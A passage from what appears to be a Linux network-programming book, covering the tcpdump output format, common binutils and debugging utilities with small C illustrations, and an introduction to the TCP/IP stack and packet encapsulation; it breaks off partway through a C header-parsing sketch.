The -v (verbose), -vv (very verbose), and -vvv (very, very verbose) options produce pro- 
gressively extended outputs. 


1.5.2. Format of tcpdump Output 


Each line of a tcpdump listing starts with a time stamp of the current time in the
hh:mm:ss.frac format, where frac is fractions of a second. The time stamp can be followed by
the interface (e.g., eth0, eth1, or lo) used to receive or send packets. The transmission
direction is indicated using the < or > characters. For example, eth0< means that the eth0
interface is receiving packets. Accordingly, eth0> means that the eth0 interface is sending
packets onto the network. The rest of the line depends on the type of the packet: ARP/RARP,
TCP, UDP, NBP, ATP, and so on. The following are the formats for some of the main packet types.


1.5.2.1. TCP Packets


src.port > dst.port: flags data-seqno ack window urgent options


Here, src.port and dst.port are the source and the destination IP addresses and ports.

The flags field shows the TCP header flags that are set. It can be a combination of the
S (SYN), F (FIN), P (PUSH), and R (RST) characters. A period in this field means that none of
these flags is set.

The data-seqno field describes the sequence-number range covered by the packet’s data, in
the first:last(nbytes) format. Here, first is the sequence number of the first data byte,
last is the sequence number just past the last data byte (the range runs from first up to but
not including last), and nbytes is the number of data bytes in the packet. If nbytes is 0,
first and last are the same.

The ack field gives the sequence number of the next data byte expected from the other side
of the connection (for example, the peer’s ISN + 1 in the reply to an initial SYN).

The window field specifies the window size, that is, the number of bytes of receive buffer
space available in the other direction.

The urgent field means that the packet contains urgent data (the URG flag is set).

The options field shows TCP options, if any, for example, <mss 1024> (the maximum
segment size).
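
The first:last(nbytes) notation can be checked mechanically. nbytes equals last - first, computed modulo 2^32 because TCP sequence numbers wrap around. The C sketch below parses the field. The name parse_data_seqno is hypothetical. The consistency check is added for illustration and is not something tcpdump itself does.

```c
#include <stdio.h>

/* Parse tcpdump's data-seqno field, e.g. "1000:1512(512)", and check
 * that nbytes == last - first (mod 2^32). Returns 0 on success, -1 if
 * the text does not match the format or the numbers are inconsistent. */
int parse_data_seqno(const char *s, unsigned long *first,
                     unsigned long *last, unsigned long *nbytes)
{
    if (sscanf(s, "%lu:%lu(%lu)", first, last, nbytes) != 3)
        return -1;
    /* Sequence numbers are 32-bit and wrap, so compare modulo 2^32. */
    if (((*last - *first) & 0xFFFFFFFFUL) != *nbytes)
        return -1;
    return 0;
}
```

For example, "4294967000:200(496)" is accepted. The range wraps past 2^32 - 1 and covers 296 + 200 = 496 bytes.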


1.5.2.2. UDP Packets 
src.port > dst.port: udp nbytes


The udp marker indicates a UDP packet.
The nbytes field gives the number of bytes in the UDP packet.


1.5.2.3. ICMP Packets 
src > dst: icmp: type

The icmp marker indicates an ICMP packet.

The type field indicates the type of the ICMP message, for example, echo request
or echo reply.


Chapter 2: More Tools 





The utilities described in this chapter are not used by programmers that often, but in some
situations they are indispensable. Therefore, you should be aware of their existence and have
at least a general idea of how they work. As a rule, all utilities described in the chapter are
included in any standard Linux distribution. Many of them are also part of the GNU binutils
package, which is a fundamental part of any Linux system. The home page of the binutils
package’s developers can be found at this address: http://sources.redhat.com/binutils/.
This chapter gives only a general review of each utility. For detailed information, consult
the corresponding man page.


2.1. Time 


The time utility runs the specified program. When the program finishes, the utility prints the 
timing statistics for the program run, for example: 

# time ./your_prog

real    0m0.008s
user    0m0.001s
sys     0m0.010s

Here, real is the elapsed (wall-clock) time between program start and program termination,
and user and sys are, respectively, the user-mode and the system (kernel-mode) central
processing unit times consumed by the program, in minutes (m) and seconds (s). To time
a command line that contains several arguments, a pipe, or both, run the time utility
this way:


# time /bin/sh -c "your_prog -flags | my_prog"
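
Conceptually, time starts the program as a child process and waits for it to finish. It then reports the elapsed wall-clock time together with the child's user and system CPU times. The following C sketch performs the same measurement. It assumes Linux or BSD, because wait4() is not part of POSIX. The helper run_timed() and the struct timing type are hypothetical names.

```c
#define _DEFAULT_SOURCE            /* exposes wait4() on glibc */
#include <sys/resource.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

struct timing {
    double real;   /* elapsed wall-clock time, seconds */
    double user;   /* CPU time in user mode, seconds */
    double sys;    /* CPU time in kernel mode, seconds */
};

static double timeval_seconds(struct timeval tv)
{
    return (double)tv.tv_sec + tv.tv_usec / 1e6;
}

/* Run argv[0] (searched for in PATH) and measure it roughly the way the
 * time utility does. Returns the child's exit status (127 if exec
 * failed), or -1 if fork/wait failed or the child was killed by a signal. */
int run_timed(char *const argv[], struct timing *t)
{
    struct timespec start, end;
    struct rusage ru;
    int status;

    clock_gettime(CLOCK_MONOTONIC, &start);
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {                 /* child: become the measured program */
        execvp(argv[0], argv);
        _exit(127);                 /* reached only if exec failed */
    }
    if (wait4(pid, &status, 0, &ru) < 0)   /* wait and collect CPU usage */
        return -1;
    clock_gettime(CLOCK_MONOTONIC, &end);

    t->real = (double)(end.tv_sec - start.tv_sec)
            + (end.tv_nsec - start.tv_nsec) / 1e9;
    t->user = timeval_seconds(ru.ru_utime);
    t->sys  = timeval_seconds(ru.ru_stime);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

For example, passing {"true", NULL} returns 0 and fills in three small, non-negative times. Passing {"false", NULL} returns 1.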
2.2. Gprof

The gprof utility is a profiler. You use a profiler to pinpoint functions that are called
excessively or that consume more than their fair share of computing resources, that is, to
locate bottlenecks in programs. The utility is easy to use. First, the program is compiled
and linked with profiling enabled (for GCC, the -pg option must be specified). When this
program is executed, it generates profiling information, which is stored in the gmon.out file.
The program must terminate normally, because no profile is generated if it terminates
abnormally. Finally, gprof is run with the name of the executable file to profile specified
as the argument.

The gprof utility analyzes the gmon.out file and produces execution time information
for each function. In general, this information is output as two tables, the flat profile and
the call graph, with brief remarks explaining their contents. The flat profile shows the
execution time and the number of calls for each function, which makes it easy to pinpoint
the functions with the longest execution times. The call graph helps you determine where
you may try to eliminate calls to time-hungry functions. For each function, it shows the
calling and called functions and the corresponding number of calls, as well as the time spent
executing the subroutines of each function.

Executing gprof with the -A option outputs the program’s source code annotated with
execution counts. Profiling makes sense mainly for large programs with numerous function
calls. The following is an example of a command sequence for profiling a program:

# gcc -pg -o your_prog your_prog.c
# ./your_prog
# gprof ./your_prog


2.3. Ctags 


Sometimes a program consists of numerous modules saved in different source files, and
locating, for example, the definition of a certain function becomes like looking for a needle
in a haystack. Making this task manageable is the purpose of the ctags utility. The utility
processes the source files and generates an index file named tags. Each line of the tags file
has three columns: the first column lists the function name, the second column lists the
source file containing its definition, and the third column gives a search pattern that an
editor such as vi uses to locate the definition within that file. The following is an example
of the file’s contents:

main     /usr/src/your_prog.c    /^main()$/
func1    /usr/src/your_prog.c    /^func1(arg1,arg2)$/
func2    /usr/src/your_prog.c    /^func2(arg1,arg2)$/

And this is an example of executing the ctags utility: 


# ctags *.c 
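
In the tags file itself, the three columns are separated by tab characters. The C sketch below splits one line into its fields. The struct tag type and parse_tag_line() are hypothetical names, and the fixed field sizes are an assumption made to keep the sketch short. Extended ctags versions may append extra fields after the pattern. This sketch leaves any such fields inside pattern.

```c
#include <stdio.h>
#include <string.h>

struct tag {
    char name[64];      /* function (tag) name */
    char file[256];     /* source file containing the definition */
    char pattern[256];  /* search command used by the editor */
};

/* Split "name<TAB>file<TAB>pattern" into its three fields.
 * Returns 0 on success, -1 on malformed input or overlong fields. */
int parse_tag_line(const char *line, struct tag *t)
{
    const char *tab1 = strchr(line, '\t');
    if (tab1 == NULL)
        return -1;
    const char *tab2 = strchr(tab1 + 1, '\t');
    if (tab2 == NULL)
        return -1;

    size_t n1 = (size_t)(tab1 - line);
    size_t n2 = (size_t)(tab2 - (tab1 + 1));
    size_t n3 = strcspn(tab2 + 1, "\n");   /* stop at the end of the line */
    if (n1 >= sizeof t->name || n2 >= sizeof t->file || n3 >= sizeof t->pattern)
        return -1;

    memcpy(t->name, line, n1);          t->name[n1] = '\0';
    memcpy(t->file, tab1 + 1, n2);      t->file[n2] = '\0';
    memcpy(t->pattern, tab2 + 1, n3);   t->pattern[n3] = '\0';
    return 0;
}
```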
2.4. Strace


The strace utility traces all system calls and signals for the specified program. The utility is 
run as follows: 

# strace ./your_prog

Each line of the output shows information about one system call: the name of the system
call and its arguments, followed by the returned value after an equal sign (=). The following
is an example of a line output by strace:

execve("./your_prog", ["./your_prog"], [/* 27 vars */]) = 0

Here, [/* 27 vars */] stands for the list of 27 environment variables, which strace abbreviates
so as not to clutter the output.

Running strace with the -f option also traces child processes as they are created by the
traced processes.


2.5. Ltrace 


The ltrace utility is similar to strace, but it traces calls to dynamic libraries. 


2.6. Mtrace 


The mtrace utility is used to trace a program’s use of dynamic memory. It keeps track of
memory allocation and deallocation operations, which makes it possible to find memory leaks.
Memory leaks gradually reduce available system resources until they are exhausted. To pin
down potential memory leaks in your program, perform the following sequence of steps.
First, include the mcheck.h header file in the program and place an mtrace() function call at
the start of the program. Then specify the name of the file in which the memory checking
results should be stored by exporting it in the MALLOC_TRACE environment variable, as in
the following example:

# export MALLOC_TRACE=mem.log

Running the program now will register all memory allocation and freeing operations in
the mem.log file. Finally, the mtrace utility is called as follows:

# mtrace your_prog $MALLOC_TRACE


The produced information is examined for records in which memory was allocated but
not freed. For the described procedure to succeed, the program under investigation must ter-
minate normally.
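
A small program that leaks on purpose makes the procedure easy to try. The sketch below assumes glibc, which provides mcheck.h together with the mtrace() and muntrace() functions. In recent glibc versions (2.34 and later), tracing is active only when libc_malloc_debug.so is preloaded through LD_PRELOAD. The function leak_demo() is a hypothetical example. In a real program, mtrace() would be called at the start of main().

```c
#include <mcheck.h>
#include <stdlib.h>
#include <string.h>

/* Allocates two blocks while tracing is on but frees only one, so the
 * MALLOC_TRACE log shows one allocation without a matching free.
 * Returns 0, or -1 if malloc failed. */
int leak_demo(void)
{
    mtrace();                       /* start logging to $MALLOC_TRACE */
    char *kept = malloc(32);        /* deliberately never freed */
    char *freed = malloc(64);
    if (kept == NULL || freed == NULL) {
        free(kept);
        free(freed);
        muntrace();
        return -1;
    }
    strcpy(kept, "leaked block");
    free(freed);
    muntrace();                     /* stop logging */
    return 0;
}
```

When mtrace is run on the resulting log, it should list the 32-byte block (0x20) as memory that was not freed.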


2.7. Make/gmake 


Changing one file in a multifile project means that every file depending on it must be
recompiled and the program relinked. The make utility (called gmake in some distributions)
is intended to take the sweat out of this task: it rebuilds only the targets whose prerequisites
have changed. To use the make utility, you must prepare a text file, called a makefile, in which the
relationships among the files in your program and the build rules are laid out. The rules are
recorded in the following format, where each command line must begin with a tab character:

<target>: <prerequisites>
	<command>
	<command>
	...

When make is run without arguments, it builds the first target in the makefile. This target
is customarily called all, so running make is then equivalent to running make all. The
following is an example of a makefile:

all: your_prog

your_prog: your_prog.o foo.o boo.o
	gcc your_prog.o foo.o boo.o -o your_prog

your_prog.o: your_prog.c your_prog.h
foo.o: foo.c foo.h
boo.o: boo.c boo.h

clean:
	rm -f *.o your_prog

The three .o rules list only prerequisites; make compiles these object files using its built-in
rule for C sources. The clean target deletes all object files and the program so that make can
create them anew. To build a project, all you have to do is enter the following in the command line:


# make


2.8. Automake/autoconf 


There is an easier way of preparing makefiles, namely, using the automake and autoconf
utilities. First, prepare the Makefile.am file, for example, like this:

bin_PROGRAMS = your_prog
your_prog_SOURCES = your_prog.c foo.c boo.c
AUTOMAKE_OPTIONS = foreign

The last option specifies that the standard documentation files (NEWS, README, AUTHORS,
and ChangeLog) are not required in the project, even though the GNU standards mandate
that all GNU packages include them.

Next, the configure.in file needs to be created. This can be done using the autoscan utility,
which scans the source file tree rooted at the directory specified in the command line (or at
the current directory) and creates the configure.scan file. This file is inspected, corrected as
necessary (for example, by adding the AM_INIT_AUTOMAKE macro that automake requires),
and then renamed configure.in. The last step is running the following utilities in the order
shown here:

# aclocal
# autoconf
# automake -a -c

This creates the configure script, the Makefile.in template, and the auxiliary files in the
current directory. Now, to build the project, all you have to do is enter the following
commands in the command line:


# ./configure
# make


2.9. Ldd 


The ldd utility displays the shared libraries required by the specified program. The following
is an example of running it:


# ldd ./your_prog
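
ldd itself does not load the libraries on its own. It asks the dynamic linker to list them by setting the LD_TRACE_LOADED_OBJECTS environment variable and starting the program. A running program can obtain a similar list about itself with the dl_iterate_phdr() function. The sketch below assumes glibc (or another libc that provides link.h) on Linux. The names list_loaded_objects and show_object are hypothetical.

```c
#define _GNU_SOURCE
#include <link.h>
#include <stdio.h>

/* Called by dl_iterate_phdr() once for every object mapped into the
 * process: the program itself and each shared library. */
static int show_object(struct dl_phdr_info *info, size_t size, void *data)
{
    int *count = data;
    (void)size;
    const char *name = (info->dlpi_name != NULL && info->dlpi_name[0] != '\0')
                           ? info->dlpi_name : "(main program)";
    printf("%s => 0x%lx\n", name, (unsigned long)info->dlpi_addr);
    (*count)++;
    return 0;                       /* 0 = continue with the next object */
}

/* Print the loaded objects with their load addresses and return
 * how many there are. */
int list_loaded_objects(void)
{
    int count = 0;
    dl_iterate_phdr(show_object, &count);
    return count;
}
```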


2.10. Objdump 


The objdump utility displays information about one or more object files; the particular infor-
mation to display is selected by options. For example, the -D option disassembles all sections
of the specified program; the -x option prints all headers, including the file and section
headers; the -s option shows the full contents of all sections; and the -R option lists the
dynamic relocation entries. The following is an example of running the utility:


# objdump -D ./your_prog


2.11. Hexdump and od 


The hexdump utility displays the contents of the specified file in decimal (-d), hexadecimal
(-x), octal (-b), and American Standard Code for Information Interchange, or ASCII (-c),
modes. The following is an example of running the utility:

# hexdump -c ./your_prog

The od utility is analogous to the hexdump utility:

# od -c ./your_prog
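
The canonical dump layout shows an offset, the byte values in hexadecimal, and the printable characters. The C sketch below formats one 16-byte line in a layout similar to that of hexdump -C. The function name hexdump_line and the 80-character output buffer are assumptions of the sketch.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>

/* Format up to 16 bytes (n <= 16) starting at file offset `offset` as
 * one dump line: offset, hex bytes (extra gap after 8), then |chars|.
 * Non-printable bytes appear as '.'. out must hold at least 80 chars. */
void hexdump_line(char *out, size_t offset, const unsigned char *buf, size_t n)
{
    char *p = out;
    p += sprintf(p, "%08zx  ", offset);
    for (size_t i = 0; i < 16; i++) {
        if (i < n)
            p += sprintf(p, "%02x ", buf[i]);
        else
            p += sprintf(p, "   ");        /* pad a short last line */
        if (i == 7)
            *p++ = ' ';                    /* gap between the two halves */
    }
    *p++ = '|';
    for (size_t i = 0; i < n; i++)
        *p++ = isprint(buf[i]) ? (char)buf[i] : '.';
    *p++ = '|';
    *p = '\0';
}
```

A full dump would read the file in 16-byte chunks and call hexdump_line() for each chunk, passing the running offset.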


2.12. Strings 


The strings utility displays the sequences of printable ASCII characters in a file that are at
least four characters long (the default setting, which can be changed with the -n option).
The following is an example of running the utility:


# strings ./your_prog
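
The core of strings is a scan for runs of printable bytes. The C sketch below prints every run that is at least min_len characters long. The function name print_strings is hypothetical. Following GNU strings, the tab character is treated as printable.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>

/* Print each run of at least min_len printable characters in buf on
 * its own line and return the number of runs printed. Tabs count as
 * printable; any other non-printable byte ends a run. */
int print_strings(const unsigned char *buf, size_t len, size_t min_len)
{
    int found = 0;
    size_t start = 0, run = 0;
    for (size_t i = 0; i <= len; i++) {
        /* i == len acts as a terminator that flushes the last run */
        int printable = i < len && (isprint(buf[i]) || buf[i] == '\t');
        if (printable) {
            if (run == 0)
                start = i;
            run++;
        } else {
            if (run >= min_len) {
                printf("%.*s\n", (int)run, (const char *)buf + start);
                found++;
            }
            run = 0;
        }
    }
    return found;
}
```

Applied to the bytes of an executable file with min_len set to 4, it gives output similar to that of strings ./your_prog.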


2.13. Readelf 


The readelf utility displays information about executable and linkable format (ELF) files, such as
the file header, section headers, and other structures. (See Chapter 15 for a detailed discussion of ELF files.)
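
The first 16 bytes of every ELF file (the e_ident array) identify the format. They hold the magic number 0x7f 'E' 'L' 'F', followed by the class (32- or 64-bit), the byte order, and the format version. The C sketch below decodes these bytes using the constants from <elf.h>, similar to the first lines of readelf -h. The function name describe_elf_ident is hypothetical.

```c
#include <elf.h>
#include <stdio.h>
#include <string.h>

/* Describe the identification bytes of an ELF header into out.
 * Returns 0 on success, -1 if buf does not start with an ELF header. */
int describe_elf_ident(const unsigned char *buf, size_t len,
                       char *out, size_t outlen)
{
    if (len < EI_NIDENT || memcmp(buf, ELFMAG, SELFMAG) != 0)
        return -1;                          /* no 0x7f 'E' 'L' 'F' magic */
    const char *cls = buf[EI_CLASS] == ELFCLASS32 ? "ELF32"
                    : buf[EI_CLASS] == ELFCLASS64 ? "ELF64" : "unknown class";
    const char *order = buf[EI_DATA] == ELFDATA2LSB ? "little endian"
                      : buf[EI_DATA] == ELFDATA2MSB ? "big endian"
                      : "unknown byte order";
    snprintf(out, outlen, "%s, %s, version %u",
             cls, order, (unsigned)buf[EI_VERSION]);
    return 0;
}
```

To examine a real file, read its first 16 bytes with fread() and pass them to the function.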
2.14. Size


The size utility displays section sizes for each of the specified files. By default, only the sizes
of the code (.text), data (.data), and uninitialized data (.bss) sections are listed, together with
their total in decimal and hexadecimal format. To list the sizes of all sections in the file, the
-A flag is used. The following is an example of running the utility:


# size ./your_prog


2.15. Nm 


The nm utility writes to standard output a table of symbols for each file specified in the
argument list. Symbol tables are used to debug applications. The utility displays the name
of each symbol and information about its type: a data symbol (a variable), a program symbol
(a label or a function name), and so on. The following is an example of running the utility:


# nm ./your_prog


2.16. Strip 


When a program has been debugged, the symbol table can be deleted from it. This is accom- 
plished using the strip utility: 


# strip ./your_prog


2.17. File 


The file utility performs a series of tests on each of the specified files in an attempt to classify it.
For text files, the utility tries to determine the programming language from the first 512 bytes.
For executable files, the utility displays information about the platform, the format version,
and the linking of the file (e.g., whether it uses shared libraries). The following are two
examples of running the file utility:

# file /bin/cat
/bin/cat: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses
shared libs), stripped

# file ./code.c
./code.c: ASCII C program text, with CRLF, CR, LF line terminators

The file utility must be given the path to the file to test. The path can be specified
either explicitly or implicitly, by using the which command and the file name enclosed in
backquotes (`). The following is an example of specifying the file path implicitly:

# file `which as`
/usr/bin/as: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked
(uses shared libs), stripped
2.18. Ipcs and ipcrm


The ipcs and ipcrm utilities may come in handy if your program uses interprocess
communication. Executing the ipcs utility with the -m option displays information about
shared memory segments:

# ipcs -m

The -s option shows information about semaphore arrays. The ipcrm utility is used to
remove a shared memory segment or a semaphore array. For example, the following com-
mand removes the segment with the identifier 2345097:

# ipcrm shm 2345097

For the ipcs and ipcrm utilities to work, the following options must be enabled in the
kernel:

• SYSVMSG: System V message support
• SYSVSEM: System V semaphore support
• SYSVSHM: System V shared memory support
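
The segments that ipcs -m lists and ipcrm shm removes are created with shmget() and destroyed with shmctl() using the IPC_RMID command. The following C sketch creates and then removes a private segment. The wrapper names create_segment and remove_segment are hypothetical.

```c
#include <stddef.h>
#include <sys/ipc.h>
#include <sys/shm.h>

/* Create a private System V shared memory segment of the given size
 * (readable and writable by the owner) and return its identifier,
 * the value shown in the shmid column of ipcs -m, or -1 on error. */
int create_segment(size_t size)
{
    return shmget(IPC_PRIVATE, size, IPC_CREAT | 0600);
}

/* Mark the segment for removal; this is the request ipcrm shm <id>
 * sends to the kernel. Returns 0 on success, -1 on error. */
int remove_segment(int shmid)
{
    return shmctl(shmid, IPC_RMID, NULL);
}
```

Between the two calls, the new segment appears in the output of ipcs -m under the identifier returned by create_segment(). If no process has it attached, the segment disappears after remove_segment().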


2.19. Ar and ranlib 


The ar archiver, which comes in the binutils package, can be used for creating static libraries.
The following is an example of running the utility:

# ar cr libmy.a file1.o file2.o

The r flag inserts the object files into the archive, replacing existing members with the same
names, and the c flag creates the archive without a warning if it does not exist yet. Other
flags are used for extracting from or modifying an archive (run man ar for more details).
A static library is linked to a program using gcc or g++ with the -L flag, which specifies the
directory in which to look for the library. The -L. flag (with a period) specifies that the library
is located in the current directory. Then all necessary libraries are listed using the -l switch,
followed by the library name without the lib prefix and the .a ending. That is, in the given
case, the command will look as follows:

# gcc your_prog.c -L. -lmy -o your_prog

While this method of obtaining a static library works in most cases, it does not work on
some systems, because a symbol table (i.e., an index of the library’s functions and variables)
has to be added to the archive created by the ar utility for the linking process to succeed. This
is done using the standard ranlib utility from the binutils package:

# ranlib libmy.a

Now the library can be linked to a program using gcc as shown in the previous example.
It is recommended that you always process archives with the ranlib utility when creating
a static library.
2.20. Arp


The arp utility is used to view and manipulate the system ARP cache.

The -a option outputs the entire contents of the ARP cache in the BSD style, and the
-e option does this in the Linux style:

# arp -e

The -d option is used to clear the entry for the specified host:

# arp -d IP_address

The entry, however, is not deleted from the cache; the hardware address field (HWaddress)
is simply cleared.

A mapping entry from the host to the hardware address can be added to the ARP cache
using the -s option as follows:

# arp -s IP_address MAC_address
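
On Linux, the ARP cache can also be read as text from /proc/net/arp. Its columns are IP address, HW type, Flags, HW address, Mask, and Device. In the Flags column, the bit 0x2 (ATF_COM) marks a completed entry. Entries without a resolved hardware address do not have this bit set. The sketch below parses one data line of that file. The struct arp_entry type and the function names are hypothetical, and the column layout is assumed from current kernels.

```c
#include <stdio.h>

struct arp_entry {
    char ip[16];        /* dotted IPv4 address */
    char mac[18];       /* xx:xx:xx:xx:xx:xx */
    char dev[16];       /* interface name, e.g. eth0 */
    unsigned flags;     /* 0x2 = ATF_COM (entry complete) */
};

/* Parse one data line of /proc/net/arp. Returns 0 on success and -1
 * on malformed input, such as the header line. */
int parse_arp_line(const char *line, struct arp_entry *e)
{
    unsigned hwtype;
    /* IP address, HW type, Flags, HW address, Mask (skipped), Device */
    if (sscanf(line, "%15s %x %x %17s %*s %15s",
               e->ip, &hwtype, &e->flags, e->mac, e->dev) != 5)
        return -1;
    return 0;
}

/* Nonzero if the hardware address of the entry has been resolved. */
int arp_entry_complete(const struct arp_entry *e)
{
    return (e->flags & 0x02) != 0;
}
```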
Many network war utilities require direct access to network packet header fields. Therefore,
you should know how network packets are formed, the general structure of the main packet
types, and the specifics of working with them. I assume that you followed my recommenda-
tion and familiarized yourself with the literature suggested in the introduction. In this chapter,
therefore, I only give general information to refresh your knowledge and some information
that cannot be readily found in programming textbooks.


3.1. TCP/IP Stack 


All network utilities considered in this book use only the TCP/IP stack, because this is the
main protocol stack used in local and wide area networks, including the Internet. Moreover,
only Internet protocol version 4 (IPv4) is considered: even though Internet protocol version 6
(IPv6) is gradually being implemented in some countries, it still has a long way to go before
it becomes widely used. Considering IPv6 would therefore only needlessly complicate the
source code of the example programs without delivering any tangible benefits.

TCP/IP is a suite of network protocols oriented toward joint use. The core protocols in 
this suite are the following: 


• The Internet protocol (IP) is responsible for transferring data, called datagrams, from one
node to another, with each host uniquely identified by an IP address. IP is thus responsible
for addressing across the entire network, because IP addresses are used only in the headers
of IP datagrams. IP is an unreliable, connectionless protocol. This means that each datagram
is sent over the network independently of the others and, accordingly, there is no guarantee
that any datagram will arrive at its destination or that the datagrams will arrive in the
original sequence. IPv4 is described in Request for Comments (RFC) 791.

• The Internet control message protocol (ICMP) provides various low-level support services
for IP, such as sending messages about problems with routing IP datagrams. ICMP is defined
in RFC 792, with additional information provided in RFC 950 and RFC 1256.

• The address resolution protocol (ARP) is responsible for mapping the IP address of a node
to its hardware (MAC) address. ARP is defined in RFC 826. There is also the reverse address
resolution protocol (RARP), which resolves a MAC address to an IP address. RARP is
defined in RFC 903.

• The transmission control protocol (TCP) is a reliable, connection-oriented protocol. That
is, this protocol provides guaranteed delivery of data packets and supports virtual connec-
tions by using a system of acknowledgments and packet retransmission when necessary.
TCP is defined in RFC 793, with amendments given in RFC 1072 and RFC 1146.

• The user datagram protocol (UDP) provides a simple, unreliable datagram communication
service to specific applications on the specified node. UDP is defined in RFC 768.


The described protocols can be considered the fundamental protocols, because they form
the basis of TCP/IP network operation.

Connection-oriented protocols (e.g., TCP) are typically called stream protocols; connec-
tionless protocols (e.g., IP, UDP, ICMP, ARP, and RARP) are called datagram protocols.

Other protocol stacks use their own network protocol suites. For example, the IPX/SPX
stack from Novell is a suite of protocols consisting of NLSP, IPX, SPX, NCP, SAP, and others.
An individual protocol does not necessarily belong to a single protocol stack. Practically all
application and data link layer protocols belong to the TCP/IP stack only by convention,
because they can and do work in other protocol stacks.

The TCP/IP stack is based on a multilayer protocol interaction scheme. TCP/IP protocols 
map to a four-layer conceptual model: the application layer, the transport layer, the internet 
layer, and the network interface layer. 

The International Organization for Standardization (ISO) proposed its own universal protocol
stack model, called the open systems interconnection (OSI) reference model. This model,
however, is not used in practice and only serves as a standard for classifying and comparing
protocol stacks. Figure 3.1 shows the approximate mapping of the layers of the TCP/IP stack,
with some of their protocols, to the OSI model.

In the ensuing material, protocol layers are mentioned without specifying whether they
pertain to the OSI model or the TCP/IP stack. You should be able to figure it out yourself, and
Fig. 3.1 is intended to help you in this task.
OSI model            Standard protocols                        TCP/IP stack
Application layer    HTTP, FTP, Telnet, SMTP, SSL, SSH, SNMP   Application layer
Presentation layer
Session layer
Transport layer      TCP, UDP                                  Host-to-host transport layer
Network layer        IP, ICMP, IGMP, RIP, ARP, RARP, OSPF      Internet layer
Data link layer      Ethernet, FDDI, ATM, PPP                  Network interface layer
Physical layer

Fig. 3.1. Approximate mapping of the TCP/IP stack layers to the OSI model





3.2. RFC as the Main Source of Information 


The standards of protocols in the TCP/IP stack and the related internal workings of the Inter- 
net are published in a series of uniquely numbered documents, or RFCs. The original RFCs 
are never updated; if changes are required, they are published in a new RFC. 

RFCs are divided into the following subsets: 


• Standard (STD) documents publish Internet protocols that have undergone the Internet
Engineering Task Force examination and testing procedure and have been officially ac-
cepted as standards.

• For Your Information (FYI) documents are introductory and informational materials in-
tended for the general public.

• Best Current Practice (BCP) documents describe accepted procedures and recommenda-
tions concerning the use of Internet technologies.


Each of the listed series has its own document numbering order. Often, the same docu- 
ment can be included in different series under different numbers. For example, RFC 3066, 
“Tags for the Identification of Languages,” is also known as BCP 47. 

You can obtain RFCs from different sources, the easiest being the http://www.faqs.org/rfcs/
or the http://www.rfc-editor.org site. The latter resource is a clearing house for RFC
documents. Both sites offer an easy-to-use facility for searching the contents by keywords,
which is handy if you don’t know the number of the RFC you need. You can also download
the complete RFC index from them.
3.3. Packets and Encapsulation


Data are sent over the network as packets, whose maximum size is determined by the data link
layer. Each packet consists of a header and a payload, or simply data. The header contains
various service data, for example, the packet’s source and destination. The payload is the data
that have to be transmitted.

Blocks of transferred data are named differently depending on the specific TCP/IP stack 
layer and on whether a datagram or stream protocol is considered (see Fig. 3.2). 


[Figure: terms for a data block at each TCP/IP stack layer, down to the network interface
layer, shown separately for stream protocols (TCP) and datagram protocols (IP, UDP, ICMP)]

Fig. 3.2. Terms used to denote a data block at different TCP/IP stack layers


[Figure: the request GET / HTTP/1.1\r\nHost: www.example.com\r\n\r\n passes down the
TCP/IP stack from the application layer through the host-to-host transport layer, the internet
layer, and the network interface layer (Ethernet) to the network]

Fig. 3.3. Forming a network packet in the TCP/IP stack


Chapter 3: Introduction to Network Programming 35 


In this book, I mostly use the universal term “packet.” 

A packet is built starting at the topmost layer and proceeding down the protocol stack. Each
layer adds its own header to the packet. Thus, the packet of a higher layer, consisting of its
payload and header, becomes the payload of the packet at the next layer down. This process is
called encapsulation. After a packet is completed, it is sent by the physical layer to the destina-
tion node, where the encapsulated data are disassembled in reverse order.

Consider a specific example (see Fig. 3.3). 

A user who wants to view, for example, the http://www.example.com page on the Inter-
net enters this address into the browser’s address bar and presses the <Enter> key. The
hypertext transfer protocol (HTTP; HTTP/1.1 is defined in RFC 2068) is responsible for
interaction and information exchange between the server and the Web browser, so the Web
browser forms the following request according to the specification of this protocol:

GET / HTTP/1.1\r\n 

Host: www.example.com\r\n\r\n 

(A browser will usually include more data in a request, but to keep things simple I show
only the essential data.)

This data block is passed to the transport layer. According to RFC 2068, HTTP requires
reliable data transmission; therefore, a TCP header is added to the data block at the transport
layer. The TCP header specifies the destination port number (usually, port 80), the source
port number, and other information. The detailed structure of the TCP header and of other
headers is considered in Section 3.4. The transport layer passes the packet to the internet layer,
which adds its own IP header to it. The header contains the source and the destination IP
addresses, as well as other information. The server’s domain name (i.e., www.example.com)
must have been resolved to the corresponding IP address beforehand; if this cannot be done
using the local computer’s resources, a request is made to a DNS server. From the internet
layer, the packet is sent to the network interface layer. The type of header added at this layer
depends on the network type. An Ethernet header is added for an Ethernet local network (as is
the case in the example), an FDDI header is added for a fiber distributed data interface network,
a PPP header is added for a modem point-to-point connection, and so on.

The Ethernet header contains the source and destination hardware, or MAC, addresses. The destination MAC address is looked up in the ARP cache of the local computer. If it is not found there, the computer broadcasts an ARP request to learn the MAC address that corresponds to the destination IP address (or, if the destination is on another network, the MAC address of the router through which the packet must pass).

When a packet is completely assembled, it is sent on the network. Because a packet may pass through different networks en route, its data link layer header may be changed by the transit routers. Moreover, a packet may be fragmented into smaller packets if network limitations make transmitting the complete packet impossible.

When a packet arrives at the server, the server's TCP/IP stack repeats the preceding sequence of operations in reverse order. First, the data link layer header is examined and, if the hardware address is correct, the header is removed. The rest of the packet is passed to the internet layer, which checks the IP address, the checksum, and other data. If all checks are successful, it removes the IP header and passes the rest of the packet to the transport layer. The transport layer checks the destination port, the checksum, and the other TCP header fields; if all checks are successful, the TCP header is removed and the remaining part of the packet is passed up to the application layer, that is, to the Web server. The Web server examines the HTTP request and prepares an HTTP response: either the requested page or an error message if the page cannot be found. The response then travels through the server's TCP/IP stack just as the request traveled through the client's.
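The receiving side's work of peeling off the headers can be sketched as follows, assuming an Ethernet frame that carries IPv4 and TCP. The IP header length comes from the low 4 bits of the first IP byte (counted in 4-byte words) and the TCP header length from the high 4 bits of byte 12 of the TCP header. The function name tcp_payload_offset() is hypothetical, and checksums and addresses are deliberately not verified.

```c
#include <stddef.h>

/* Hypothetical helper: return the offset of the application data (e.g.
 * the HTTP request) in a raw Ethernet frame carrying IPv4/TCP, or -1 if
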